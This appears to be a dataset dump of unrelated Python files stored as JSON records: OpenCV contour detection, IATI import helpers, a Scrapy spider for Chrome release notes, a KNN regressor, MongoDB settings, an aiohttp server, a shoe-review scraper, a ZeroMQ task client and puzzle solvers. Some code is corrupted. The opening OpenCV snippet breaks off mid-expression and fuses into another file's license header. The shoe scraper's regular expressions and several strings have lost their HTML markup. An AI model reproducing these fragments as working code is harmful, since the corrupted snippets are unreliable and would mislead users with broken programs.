cv2.getStructuringElement(cv2.MORPH_RECT, (10,10))\r\n thresh = cv2.morphologyEx(thresh, cv2.MORPH_DILATE, kernel)\r\n #thresh = cv2.dilate(thresh,kernel,iterations = 1)\r\n\r\n # cv2.imshow('thresh',thresh)\r\n # cv2.waitKey(0)\r\n\r\n #find contours\r\n im2, cnts, hierarchy = cv2.findContours(~thresh.copy(), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\r\n cnts = sorted(cnts, key = cv2.contourArea, reverse = True)[:2] # get largest five contour area\r\n rects = []\r\n roi_copy = img.copy()\r\n\r\n for c in cnts:\r\n peri = cv2.arcLength(c, True)\r\n approx = cv2.approxPolyDP(c, 0.02 * peri, True)\r\n x, y, w, h = cv2.boundingRect(approx)\r\n # check height of contour\r\n if h >= 0.4*500:\r\n # if height is enough\r\n # create rectangle for bounding\r\n rect = (x, y, x+w, y+h)\r\n rects.append(rect)\r\n cv2.rectangle(roi_copy, (x, y), (x+w, y+h), (0, 255, 0), 3);\r\n # cv2.imshow('thresh',roi_copy)\r\n # cv2.waitKey(0)\r\n # cv2.destroyAllWindows()\r\n\r\n ratio_rm = 9\r\n if(len(rects))==0:\r\n return False\r\n elif len(rects)==1:\r\n #print(width-rects[0][2],ratio_rm*(width/height))\r\n if(width-rects[0][2]1\r\n for r in rects :\r\n x1,y1,x2,y2 = r\r\n if x1 > 0.45*width:\r\n if(width-x2.\n\nfrom ...rsr.models.iati_import_log import IatiImportLog\n\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db.models import get_model\n\n\ndef add_log(iati_import, field, error, project=None, severity=IatiImportLog.VALUE_NOT_SAVED):\n \"\"\"\n Add a log entry in the IatiImportLog model.\n\n :param iati_import: IatiImport instance\n :param field: String; name of the field\n :param error: String; error description\n :param project: Project instance\n :param severity: Integer\n \"\"\"\n get_model('rsr', 'iatiimportlog').objects.create(\n iati_import=iati_import,\n text=u'%s: %s.' % (field, error),\n project=project,\n severity=severity\n )\n\n\ndef get_text(element, version):\n \"\"\"\n Returns the text of an element. Based on the IATI version, this is the direct text of the\n element (v1) or the the text in the underlying 'narrative' element (v2).\n\n :param element: ElementTree node\n :param version: String; the full IATI version, e.g. '1.03' or '2.01'\n :return: String; text of the element or None in case there is no text\n \"\"\"\n if version[0] == '1':\n return element.text or ''\n else:\n narrative_element = element.find('narrative')\n if narrative_element is not None:\n return narrative_element.text or ''\n return ''\n\n\ndef get_or_create_organisation(ref, name):\n \"\"\"\n Looks for an organisation in the RSR database.\n First the ref will be looked up in the Organisation.iati_org_id field. If this does not exist,\n the name will be looked up in the Organisation.name and Organisation.long_name fields.\n If none of these return a match, a new organisation will be created.\n\n :param ref: String; the reference of the organisation that is specified in the IATI file.\n :param name: String; the name of the organisation that is specified in the IATI file.\n :return: Organisation instance or None\n \"\"\"\n if not (ref or name):\n return None\n\n if ref:\n try:\n return get_model('rsr', 'organisation').objects.get(iati_org_id=ref)\n except ObjectDoesNotExist:\n pass\n\n if name:\n try:\n return get_model('rsr', 'organisation').objects.get(name=name[:25])\n except ObjectDoesNotExist:\n try:\n return get_model('rsr', 'organisation').objects.get(long_name=name[:75])\n except ObjectDoesNotExist:\n pass\n\n return get_model('rsr', 'organisation').objects.create(\n name=name[:25],\n long_name=name[:75],\n iati_org_id=ref if ref else None,\n organisation_type='N'\n )\n","sub_path":"akvo/iati/imports/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"640014661","text":"# -*- coding: utf-8 -*-\nimport logging\nimport pdb\nimport re\nimport json\nimport scrapy\n\nfrom spiders.common.constantFields import TYPE_URL, TYPE_ITEM\nfrom spiders.common.http_post import send_http\nfrom spiders.spiders.base import BaseSpider\n\n\nclass ChromereleasesSpider(BaseSpider):\n name = 'chromereleases'\n allowed_domains = ['googleblog.com']\n start_urls = ['https://chromereleases.googleblog.com/']\n parsePage = 'getList'\n custom_settings = {\n 'CONCURRENT_REQUESTS': 1,\n 'DOWNLOAD_DELAY': 2,\n }\n\n def getList(self, response):\n logging.info('start getList')\n metaInfo = response.meta.get('metaInfo')\n itemInfoList = []\n self.pageCount += 1 # 统计页数\n\n cveItemInfoList = response.xpath('//div[@id=\"Blog1\"]/div[@itemtype]')\n for i, cveItemSel in enumerate(cveItemInfoList):\n detailUrl = cveItemSel.xpath('./h2/a/@href').extract()[0]\n pubTime = cveItemSel.xpath('.//div[@class=\"published\"]/span/text()').extract()[0].strip()\n if self.pageCount == 1 and i == 0: # 记录当天最新数据\n self.today_latest_item_data = {\n 'url': detailUrl,\n 'pubTime': pubTime\n }\n logging.info('lastest data is %s' % json.dumps(self.today_latest_item_data))\n\n if detailUrl == self.latestDataInfo.get('url') and pubTime == self.latestDataInfo.get(\n 'pubTime'): # 根据时间和url进行判断是否为新数据\n logging.info('find history data, stop spider')\n self.resInfo['endInfo'] = 'find history data, stop spider'\n break\n\n urlInfo = {\n 'itemType': TYPE_URL,\n 'parsePage': 'getCveItemInfo',\n 'metaInfo': metaInfo,\n 'item': detailUrl,\n }\n itemInfoList.append(urlInfo)\n\n else:\n # next page\n nextPageUrl = response.xpath('//a[@class=\"blog-pager-older-link\"]/@href').extract()[0]\n urlInfo = {\n 'itemType': TYPE_URL,\n 'parsePage': 'getList',\n 'metaInfo': metaInfo,\n 'item': nextPageUrl,\n }\n if self.pageCount < self.maxPageCount: # 防止出错停止不了\n itemInfoList.append(urlInfo)\n else:\n logging.info('stop spider mandatory, spider page count is %d' % self.maxPageCount)\n return itemInfoList\n\n def getCveItemInfo(self, response):\n logging.info('start getCveItemInfo')\n metaInfo = response.meta.get('metaInfo')\n itemInfoList = []\n descriptionStrList = response.xpath('//div[@class=\"post-body\"]//script/text()').extract()\n descStr = ''.join(descriptionStrList)\n contentSel = scrapy.Selector(text=descStr)\n description = ''.join(contentSel.xpath('.//text()').extract()).strip()\n\n item = {}\n item['cveDesc'] = description\n item['cveSource'] = 'GOOGLE'\n item['cveItemTitle'] = response.xpath('//h2[@class=\"title\"]/a/text()').extract()[0].strip()\n item['cveItemUrl'] = response.url\n item['pubTime'] = self.parseTime(response.xpath('//span[@class=\"publishdate\"]/text()').extract()[0].strip())\n urlInfo = {\n 'itemType': TYPE_ITEM,\n 'item': item,\n }\n itemInfoList.append(urlInfo)\n return itemInfoList\n\n def parseTime(self, timeStr):\n monthDict = {'January': '1',\n 'February': '2',\n 'March': '3',\n 'April': '4',\n 'May': '5',\n 'June': '6',\n 'July': '7',\n 'August': '8',\n 'September': '9',\n 'October': '10',\n 'November': '11',\n 'December': '12'\n }\n timeStrList = timeStr.split(',')[1:]\n year = timeStrList[1].strip()\n day = timeStrList[0].strip().split(' ')[1]\n month = monthDict.get(timeStrList[0].strip().split(' ')[0].strip())\n timeStr = '%s-%s-%s' % (year, month, day)\n return timeStr\n\n\n# 运行命令:scrapy crawl chromereleases -a taskType=spider -a taskId=1 -o data.csv\n# 部分抓取:scrapy crawl chromereleases -a taskType=update -a taskId=1 -a sourceUrls=[\\\"https://www.ibm.com/blogs/psirt/security-bulletin-cross-site-scripting-vulnerability-affect-ibm-business-automation-workflow-and-ibm-business-process-manager-bpm-cve-2020-4698-2/\\\"]\n# 调试:scrapy crawl chromereleases -a taskType=update -a spiderType=test -a taskId=1 -a sourceUrls=[\\\"https://www.ibm.com/blogs/psirt/security-bulletin-cross-site-scripting-vulnerability-affect-ibm-business-automation-workflow-and-ibm-business-process-manager-bpm-cve-2020-4698-2/\\\"]\n\n'''\n\nhttps://chromereleases.googleblog.com/2020/10/stable-channel-update-for-desktop.html\n\n\nhttps://chromereleases.googleblog.com/2020/09/stable-channel-update-for-desktop_21.html\n\n'''\n","sub_path":"spiders/spiders/chromereleases.py","file_name":"chromereleases.py","file_ext":"py","file_size_in_byte":5081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"341632483","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import KNeighborsRegressor\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.ensemble import BaggingRegressor\nfrom math import sqrt\n\ndef mean_absolute_percentage_error(y_true, y_pred):\n if len(y_true) != len(y_pred):\n raise Exception(\"mean_absolute_percentage_error, len is not the same\")\n perc_sum = 0\n for index in range(len(y_true)):\n if y_true[index] != 0:\n perc_sum += (abs(y_true[index] - y_pred[index]) / y_true[index])\n else:\n perc_sum += (abs(y_true[index] - 0.1) / 0.1)\n return perc_sum / (len(y_true))\n\nurl = (\"../data/simulation_1.csv\")\ndata = pd.read_csv(url)\nprint(data.head())\nprint(data[\"latency\"][0])\ndata[\"latency\"].hist(bins=15)\nplt.show()\n\n# remove unused data\ndata.drop(\"content_encripted\", axis=1, inplace=True)\ndata.drop(\"high_security\", axis=1, inplace=True)\ndata.drop(\"destination\", axis=1, inplace=True)\ndata.drop(\"l_1\", axis=1, inplace=True)\ndata.drop(\"l_2\", axis=1, inplace=True)\n\ncorrelation_matrix = data.corr()\nprint(correlation_matrix[\"latency\"])\n\nX = data.drop(\"latency\", axis=1)\nX = X.values\n\ny = data[\"latency\"]\ny = y.values\n\nX_train, X_test, y_train, y_test = train_test_split(\n X, y, test_size=0.2, random_state=12345\n)\n\n# ----------------- Grid search\nprint(\" -----------------Grid search\")\n\nparameters = {\n \"n_neighbors\": range(1, 50),\n \"weights\": [\"uniform\", \"distance\"],\n}\ngridsearch = GridSearchCV(KNeighborsRegressor(), parameters)\ngridsearch.fit(X_train, y_train)\n\nprint(\"Grid search best params\", gridsearch.best_params_)\ntrain_preds_grid = gridsearch.predict(X_train)\ntrain_mse = mean_squared_error(y_train, train_preds_grid)\ntrain_rmse = sqrt(train_mse)\ntrain_mape = mean_absolute_percentage_error(y_train, train_preds_grid)\nprint(\"Error (rmse) training\", train_rmse)\nprint(\"Error (mape) training\", train_mape)\n\n\ntest_preds_grid = gridsearch.predict(X_test)\ntest_mse = mean_squared_error(y_test, test_preds_grid)\ntest_rmse = sqrt(test_mse)\ntest_mape = mean_absolute_percentage_error(y_test, test_preds_grid)\nprint(\"Error (rmse) testing\", test_rmse)\nprint(\"Error (mape) testing\", test_mape)\n\n# ----------------- bagged_knn\nprint(\"----------------- bagged_knn\")\nbest_k = gridsearch.best_params_[\"n_neighbors\"]\nbest_weights = gridsearch.best_params_[\"weights\"]\nbagged_knn = KNeighborsRegressor(\n n_neighbors=best_k, weights=best_weights\n)\nbagging_model = BaggingRegressor(bagged_knn, n_estimators=100)\nbagging_model.fit(X_train, y_train)\ntrain_preds_grid = bagging_model.predict(X_train)\ntrain_mse = mean_squared_error(y_train, train_preds_grid)\ntrain_rmse = sqrt(train_mse)\ntrain_mape = mean_absolute_percentage_error(y_train, train_preds_grid)\nprint(\"Error (rmse) training\", train_rmse)\nprint(\"Error (mape) training\", train_mape)\n\ntest_preds_bag = bagging_model.predict(X_test)\ntest_mse = mean_squared_error(y_test, test_preds_bag)\ntest_rmse = sqrt(test_mse)\ntest_mape = mean_absolute_percentage_error(y_test, test_preds_bag)\nprint(\"Error (rmse) testing\", test_rmse)\nprint(\"Error (mape) testing\", test_mape)","sub_path":"ReasoningEngine/KNN/predictor.py","file_name":"predictor.py","file_ext":"py","file_size_in_byte":3226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"186105320","text":"import pymongo\n\nclient = pymongo.MongoClient('localhost', 27017)\ndb = client.ram\n\n\ndef getSettings(server_id, cog=None):\n s = db['settings'].find_one({'server_id': server_id})\n if cog == None:\n return s\n if s == None:\n return {'enabled': False}\n else:\n return s.get(cog, {'enabled': False})\n\n\ndef updateCogSettings(server_id, cog_name, new_settings):\n db['settings'].update_one({'server_id': server_id}, {'$set': {cog_name: new_settings}}, upsert=True)\n\n\ndef updateSettings(server_id, new_settings):\n db['settings'].update_one({'server_id': server_id}, {'$set': new_settings}, upsert=True)\n","sub_path":"db/DB.py","file_name":"DB.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"57967319","text":"import csv\nimport json\n\nfrom aiohttp import web\n\n\ndef to_json(obj):\n return json.dumps(obj, indent=2, sort_keys=True)\n\n\n# test using curl:\n# curl -v http://127.0.0.1/ -X GET -H \"Content-Type: application/json\"\n# curl -v http://127.0.0.1/ -X GET -H \"content-type: text/csv\"\nasync def handle(request):\n\n # https://developer.mozilla.org/en-US/docs/Web/HTTP/Basics_of_HTTP/MIME_types/Common_types\n content_type = request.headers.get('Content-Type', 'text/plain')\n print(f't = {content_type}')\n\n if content_type == 'application/json':\n data = {'some': 'data'}\n # https://docs.aiohttp.org/en/stable/web_quickstart.html#json-response\n return web.json_response(data)\n\n if content_type == 'text/plain':\n # https://docs.aiohttp.org/en/stable/web_reference.html#aiohttp.web.Response\n return web.Response(text='OK')\n\n if content_type == 'text/csv':\n content = \"\"\"Id, Name\n1, user1\n2, user2\n3, user3\n\"\"\"\n headers = {'Content-Type': 'text/csv; charset=UTF-8'}\n return web.Response(\n body=content,\n headers=headers\n )\n\n # https://docs.aiohttp.org/en/stable/web_quickstart.html#exceptions\n raise web.HTTPBadRequest(text=f'unknown content type: {content_type}')\n\n\napp = web.Application()\napp.add_routes([\n web.get('/', handle),\n])\n\nif __name__ == '__main__':\n web.run_app(app, host='127.0.0.1', port=80)\n","sub_path":"aiohttp/server_5_output.py","file_name":"server_5_output.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"318744667","text":"#! /usr/bin/python3\n# *-* coding: utf-8 *-*\n\"\"\"31comprehensions-list\n@Author: wikinee\n@License: MIT\n\"\"\"\n\nprint(\"--- list comprehensions ---\")\nmultiples = [i for i in range(30) if i % 3 is 0]\nprint(multiples)\n\nsquared = []\nfor x in range(10):\n squared.append(x**2)\n\n# or\n# squared = [x**2 for x in range(10)]\n\nprint(\"--- dict comprehensions ---\")\n\nmcase = {'a': 10, 'b': 42, 'A': 7, 'Z': 3}\n\n\n# mcase_frequency == {'a': 17, 'z': 3, 'b': 34}\nmcase_frequency = {\n k.lower(): mcase.get(k.lower(), 0) + mcase.get(k.upper(), 0)\n for k in mcase\n}\nprint(mcase_frequency)\n# {v: k for k, v in some_dict.items()}\n\nprint(\"--- set comprehensions ---\")\nsquared = {x**2 for x in [1, 1, 2]}\nprint(squared)\n","sub_path":"Python/interpy/31comprehensions.py","file_name":"31comprehensions.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"175991621","text":"#! /uspair/bin/env python3\n\ndef find_pairs(bishop_locations, board_size):\n dic = {}\n pairs = 0\n\n for _, v in enumerate(bishop_locations):\n dic[v] = True\n\n for _, v in enumerate(bishop_locations):\n row, col = v\n\n cur_sw = cur_nw = cur_ne = cur_se = (row, col)\n loop = True\n while loop:\n loop = False\n cur_sw = (cur_sw[0] + 1, cur_sw[1] - 1)\n\n cur_nw = (cur_nw[0] - 1, cur_nw[1] - 1)\n\n cur_ne = (cur_ne[0] - 1, cur_nw[1] + 1)\n\n cur_se = (cur_se[0] + 1, cur_se[1]+ 1)\n\n if board_size > cur_sw[0] >= 0 and board_size > cur_sw[1] >= 0:\n loop = True\n if cur_sw in dic:\n pairs += 1\n\n if board_size > cur_nw[0] >= 0 and board_size > cur_nw[1] >= 0:\n loop = True\n if cur_nw in dic:\n pairs += 1\n\n if board_size > cur_ne[0] >= 0 and board_size > cur_ne[1] >= 0:\n loop = True\n if cur_ne in dic:\n pairs += 1\n\n if board_size > cur_se[0] >= 0 and board_size > cur_se[1] >= 0:\n loop = True\n if cur_se in dic:\n pairs += 1\n\n return pairs\n\n\n\nif __name__ == '__main__':\n print(find_pairs([\n (0, 0),\n (1, 2),\n (2, 2),\n (4, 0)\n ], 5))\n print(find_pairs([\n (0, 0),\n (1, 1),\n (0, 3),\n (3, 0),\n (4, 2),\n (4, 4),\n (5, 1)\n ], 6))\n","sub_path":"challenge68/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"218231619","text":"# -*- coding: utf-8 -*-\nfrom yowsup.layers.protocol_messages.protocolentities import TextMessageProtocolEntity\nimport requests\nimport config\n\n\nclass WikiViews(object):\n def __init__(self, interface_layer):\n self.routes = [\n ('^' + config.cmd_prefix + '(?:w|wiki|wikipedia)\\s(?P[^$]+)$', self.wiki)\n ]\n\n def wiki(self, message, match):\n term = match.group('term')\n url = 'https://en.wikipedia.org/w/api.php?' \\\n 'format=json&' \\\n 'action=query&' \\\n 'prop=extracts|info&' \\\n 'inprop=url&' \\\n 'exintro=&' \\\n 'explaintext=&' \\\n 'redirects=&' \\\n 'exchars=500&' \\\n 'titles=%s' % term\n r = requests.get(url).json()\n msg = ''\n\n for k, v in r.iteritems():\n if k == 'query':\n for x, y in v['pages'].iteritems():\n title = y['title'].encode('utf-8')\n url = y['fullurl'].encode('utf-8')\n extract = y['extract'].encode('utf-8')\n msg = '{title}\\n{url}\\n\\n{extract}'.format(title=title, url=url, extract=extract)\n\n return TextMessageProtocolEntity(msg, to=message.getFrom())\n","sub_path":"src/views/wiki.py","file_name":"wiki.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"189874475","text":"import csv\nimport json\nimport os\nimport re\nimport sys\nimport pandas\n\n\nimport requests\n\n\nurl = 'https://runrepeat.com/ranking/rankings-of-running-shoes'\n\nshoe_directory= 'shoes'\nfrontpage_filename = 'shoes_1.html'\ncsv_filename = 'shoes_data.csv'\n\n\ndef pripravi_imenik(ime_datoteke):\n '''Če še ne obstaja, pripravi prazen imenik za dano datoteko.'''\n imenik = os.path.dirname(ime_datoteke)\n if imenik:\n os.makedirs(imenik, exist_ok=True)\n\n\ndef shrani_spletno_stran(url, ime_datoteke, vsili_prenos=False):\n '''Vsebino strani na danem naslovu shrani v datoteko z danim imenom.'''\n try:\n print('Shranjujem {} ...'.format(url), end='')\n sys.stdout.flush()\n if os.path.isfile(ime_datoteke) and not vsili_prenos:\n print('shranjeno že od prej!')\n return\n r = requests.get(url)\n except requests.exceptions.ConnectionError:\n print('stran ne obstaja!')\n else:\n pripravi_imenik(ime_datoteke)\n with open(ime_datoteke, 'w', encoding='utf-8') as datoteka:\n datoteka.write(r.text)\n print('shranjeno!')\n\n\ndef vsebina_datoteke(ime_datoteke):\n '''Vrne niz z vsebino datoteke z danim imenom.'''\n with open(ime_datoteke, encoding='utf-8') as datoteka:\n return datoteka.read()\n\n\ndef zapisi_csv(slovarji, imena_polj, ime_datoteke):\n '''Iz seznama slovarjev ustvari CSV datoteko z glavo.'''\n pripravi_imenik(ime_datoteke)\n with open(ime_datoteke, 'w', encoding='utf-8') as csv_datoteka:\n writer = csv.DictWriter(csv_datoteka, fieldnames=imena_polj)\n writer.writeheader()\n for slovar in slovarji:\n writer.writerow(slovar)\n\n\ndef zapisi_json(objekt, ime_datoteke):\n '''Iz danega objekta ustvari JSON datoteko.'''\n pripravi_imenik(ime_datoteke)\n with open(ime_datoteke, 'w', encoding='utf-8') as json_datoteka:\n json.dump(objekt, json_datoteka, indent=4, ensure_ascii=False)\n# s tem vzorcem bom našla linke posameznih modelov\nvzorec1 = re.compile(r'.*?)\".*?target=\"_self\">')\n# na vsakem linku za model bom zajela podatke:\nvzorec2 = re.compile(\n r'

(?P.*?)

.*?'\n r'

User ratings

\\n.*?

(?P.*?) / 5 based on (?P.*?) ratings

.*?'\n r'(?P.*?).*?'\n r'

(?P.*?)

.*?'\n r'
Top 1% overall
\\n.*?
Best running shoes
\\n.*?\\n.*?\\n.*?\\n.*?\\n.*?\\n.*?\\n.*?\\n.*?\\n.*?\\n.*?
Top 1% (?P.*?)
\\n.*?
Best (?P.*?) running shoes
'\n\n)\n\n\ndef nalozi_strani():\n for i in range(0, 33):\n url = ('https://runrepeat.com/ranking/rankings-of-running-shoes?page={}').format(i)\n shrani_spletno_stran(url, 'zajeti-podatki/stran-{}.html'.format(i))\n print('Shranjeno')\n\n#zajela bom vse strani različnih modelov, na straneh je link ki navigira do strani posameznega modela\n\npodatki_filmov = []\ndef ujemanje_linki(vzorec):\n for i in range(1, 33):\n vsebina = vsebina_datoteke('zajeti-podatki/stran-{}.html'.format(i))\n for ujemanje_modela in vzorec.finditer(vsebina):\n podatki_filmov.append(ujemanje_modela.group(1))\n return podatki_filmov\n\n# vsak link do modela, bom shranila v mapo modeli - tu so podatki posameznega modela\n\ndef zapisi_stran(podatki):\n for i in range(0,len(podatki)):\n shrani_spletno_stran(podatki[i],'modeli/model-{}.html'.format(i))\n print('Done')\n\n\n#regularni izraz, ki bo nasel ceno modela\n#vzorec_cena = re.compile(r'(?P.*?)', flags=re.DOTALL)\nvzorec_cena = re.compile(r'(\\n.*?)Price(\\n.*?)(\\n.*)
(\\n.*?)
(?P.*?)
')\n#izraz, ki bo nasel teren\nvzorec_teren = re.compile(r'
\\n.*?
')\n#izraz, ki najde znamko\n# znamka= re.compile(r'
Top 1% overall
\\n.*?
Best running shoes
\\n.*?\\n.*?\\n.*?\\n.*?\\n.*?\\n.*?\\n.*?\\n.*?\\n.*?\\n.*?
Top 1% (?P.*?)
\\n.*?
Best (?P.*?) running shoes
')\n#izraz, ki najde ime modela \nime_modela = re.compile(r'

(?P.*?)

')\n#izraz, ki najde oceno modela in stevilo ozen\nocena_in_st = re.compile(r'

User ratings

\\n.*?

(?P.*?) / 5 based on (?P.*?) ratings

.*?',\n flags=re.DOTALL\n )\n \n\nznamka_preko_linka = re.compile(r'.*?)\" alt=\"(?P.*?) brand logo\">')\n\n\n\n# podatki57 = {}\n# vsebina2 = vsebina_datoteke('modeli/model-957.html')\n# for ujemanje3 in cena.finditer(vsebina2):\n# test = ujemanje3.groupdict()\n \n# print(test)\n\n \n\n \ndef izloci_podatke_modela(vsebina):\n podatki = {}\n for ujemanje3 in znamka_preko_linka.finditer(vsebina):\n test3 = ujemanje3.groupdict(1)\n del test3['karkoli']\n podatki['znamka'] = str(test3['znamka'])\n \n for ujemanje4 in ime_modela.finditer(vsebina):\n test4 = ujemanje4.groupdict(1)\n podatki['model'] = str(test4['model'])\n \n for ujemanje2 in vzorec_teren.finditer(vsebina):\n test2 = ujemanje2.groupdict(1)\n podatki['teren'] = str(test2['teren'])\n \n ujemanje1 = vzorec_cena.search(vsebina)\n if ujemanje1:\n podatki['cena'] = int(str(ujemanje1['cena']).strip('€'))\n else:\n podatki['cena'] = None\n \n ujemanje5 = ocena_in_st.search(vsebina)\n if ujemanje5:\n podatki['ocena'] = str(ujemanje5['ocena'])\n podatki['stevilo ocen'] = str(ujemanje5['stevilo_ocen'])\n # test5 = ujemanje5.groupdict(1)\n # podatki['ocena'] = float(test5['ocena'])\n # podatki['stevilo ocen'] = int(test5['stevilo_ocen'])\n else:\n podatki['ocena']= None\n podatki['stevilo ocen'] = None\n \n return podatki\n\n\n\npodatki_modelov_skupaj = []\ndef zapisi_modele():\n for i in range(0, 959):\n vsebina_modela = vsebina_datoteke('modeli/model-{}.html'.format(i))\n podatki_modelov_skupaj.append(izloci_podatke_modela(vsebina_modela))\n\nzapisi_json(podatki_modelov_skupaj, 'obdelani-podatki/vsi-modeli.json')\nzapisi_csv(podatki_modelov_skupaj, ['znamka', 'model', 'teren', 'cena','ocena', 'stevilo ocen'],'obdelani-podatki/vsi-modeli.csv')\n\n\n","sub_path":"zajem.py","file_name":"zajem.py","file_ext":"py","file_size_in_byte":6832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"180346662","text":"\n# 此脚本是负责和中间层同心,修改客户端的任务列表和作业\n\nimport zmq,time\nimport json,socket\nimport logging\n\n\nclass oprate_task_job:\n def __init__(self,port = 9995):#端口要与本地setting。OUT_PORT 一致\n context = zmq.Context()\n self.port = str(port)\n # print('connect to server')\n self.socket = context.socket(zmq.REQ)\n self.socket.connect('tcp://localhost:'+self.port)\n self.poll = zmq.Poller()\n self.poll.register(self.socket, zmq.POLLIN)\n \"\"\"日志\"\"\"\n logging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',\n datefmt='%a, %d %b %Y %H:%M:%S',\n filename='myapp.log',\n filemode='a')\n #################################################################################################\n # 定义一个StreamHandler,将INFO级别或更高的日志信息打印到标准错误,并将其添加到当前的日志处理对象#\n console = logging.StreamHandler()\n console.setLevel(logging.INFO)\n formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')\n console.setFormatter(formatter)\n logging.getLogger('').addHandler(console)\n #################################################################################################\n\n def _port_is_free(self,port):#检查端口是否被占用,可用返回true\n s = socket.socket()\n s.settimeout(0.5)\n try:\n # s.connect_ex return 0 means port is open\n return s.connect_ex(('localhost', port)) != 0\n finally:\n s.close()\n def add_task(self,task): #成功返回的是——id\n mes = {'command':'add',\"task\":task,'type':'task'}\n self.send(mes)\n return self.recv()\n def del_task(self,id):# 'content': {'ok': 1.0, 'n': 1}}\n mes = {'command':'del',\"guid\":id,'type':'task'}\n self.send(mes)\n return self.recv()\n def update_task(self,arg):#content': {'nModified': 1, 'n': 1, 'ok': 1.0, 'updatedExisting': True} content': {'ok': 1.0, 'updatedExisting': False, 'n': 0, 'nModified': 0}\n #arg = {\"guid\":14,\"device.id\":\"guojianyu\"}#arg的格式\n mes = {'command': 'update', \"content\": arg, 'type': 'task'}\n self.send(mes)\n return self.recv()\n def pop_task(self,arg):#支持精确查找返回一个查找结果,只支持精确查找\n #arg = {\"guid\": 12, \"device.id\": \"guojianyu\"}#查找任务的格式\n mes = {'command': 'pop', \"pop\":arg, 'type': 'task'}\n self.send(mes)\n return self.recv()\n\n def add_job(self,task):#添加作业\n #需要传递整个任务属性,服务器会根据topic来确定任务类型,同过任务属性来确定生成的作业的周期等信息\n mes = {'command': 'add', \"task\": task, 'type': 'job'}\n self.send(mes)\n return self.recv()\n def del_job(self,id):#删除作业 只关心success的标示\n mes = {'command': 'del', \"job_id\": id, 'type': 'job'}\n self.send(mes)\n return self.recv()\n def update_job(self,arg):#更新作业 只关心success的标示\n mes = {'command': 'update', \"content\":{}, 'type': 'job'}\n mes['content'] = {'job_id':'sku131',' seconds':6}\n self.send(mes)\n return self.recv()\n def pop_job(self,id):#查找作业\n mes = {'command': 'pop', \"job_id\": id, 'type': 'job'}\n self.send(mes)\n return self.recv()\n def pause_job(self,id):#暂停作业 不需要关心返回值\n mes = {'command': 'pause', \"job_id\": id, 'type': 'job'}\n self.send(mes)\n return self.recv()\n def resume_job(self,id):#回复作业 不需要关心返回值\n mes = {'command': 'resume', \"job_id\": id, 'type': 'job'}\n self.send(mes)\n return self.recv()\n\n def send(self,mes):\n self.socket.send(json.dumps(mes).encode('utf-8'))\n while True:#服务器中断会一直尝试重连\n socks = dict(self.poll.poll(3000))\n if socks.get(self.socket) == zmq.POLLIN:\n break\n else:\n self.socket.setsockopt(zmq.LINGER, 0)\n self.socket.close()\n self.poll.unregister(self.socket)\n context = zmq.Context()\n self.socket = context.socket(zmq.REQ)\n self.socket.connect('tcp://localhost:'+self.port)\n self.poll.register(self.socket, zmq.POLLIN)\n self.socket.send(json.dumps(mes).encode('utf-8'))\n\n def recv(self):\n return self.socket.recv_json()\n\n def write_log(self,arg):#写日志 arg的格式 {'level':,'content':....}level是写扫描类型的日志,content是日志内容\n level= arg['level']#得到日志等级\n content = arg['content']# 日志内容\n if level == 'info':\n logging.info(content)\n elif level == 'debug':\n logging.debug(content)\n elif level == 'warning':\n logging.warning(content)\n elif level == 'error':\n logging.error(content)\n\n\n def upload_data(self,content):#上传数据接口\n mes = {'command': 'upload', \"content\": content, 'type': 'data'}\n self.send(mes)\n return self.recv()\nif __name__ == \"__main__\":\n level = ['info','debug','warning','error']\n\n task = {\"device\":\n {'type': \"\", 'version': '127.22', 'id': ''},\n 'guid': 14, 'time': time.time(), 'timeout': 40, 'topic': 'jd_task_kind',\n 'interval': 6000, # 任务执行周期间隔时间\n 'suspend': 0, # 暂停标识\n 'status': 0,\n\n 'body': {\n 'kind': '9987,830,866', 'platform': 'jd_app', 'sort': None,\n \"url\": \"https://list.jd.com/list.html?\",\n \"maxpage\": 0,\n 'shopid':1,\n \"cookie_type\": \"jd_web\",\n 'key_search': 0,\n \"data\": {\n 'key_word': '',\n \"cat\": \"670,671,672\",\n \"sort\": \"sort_rank_asc\",\n \"trans\": \"1\",\n \"page\": \"1\",\n \"JL\": \"6_0_0\"\n }\n }}\n\n obj = oprate_task_job(9995)\n arg = {'level':'info','content':'aps_all_copy'}\n ret = obj.add_task(task)\n print (ret)\n\n\n","sub_path":"client槽位增多版_test/excutor_doc/_interface.py","file_name":"_interface.py","file_ext":"py","file_size_in_byte":6491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"535192973","text":"from collections import deque\n\ndef bfs(board):\n visited = dict(zip(list(range(0, 101)), [False] * 101))\n neighbors = deque()\n visited[1] = True\n first_value = [1, 0]\n neighbors.append(first_value)\n value = []\n while len(neighbors) != 0:\n value = neighbors.popleft();\n current_position = value[0]\n if current_position == 100:\n break\n for i in range((value[0] + 1), (value[0] + 7)):\n if i < 101:\n if not visited[i]:\n if i % 10 != 0:\n x = int(i / 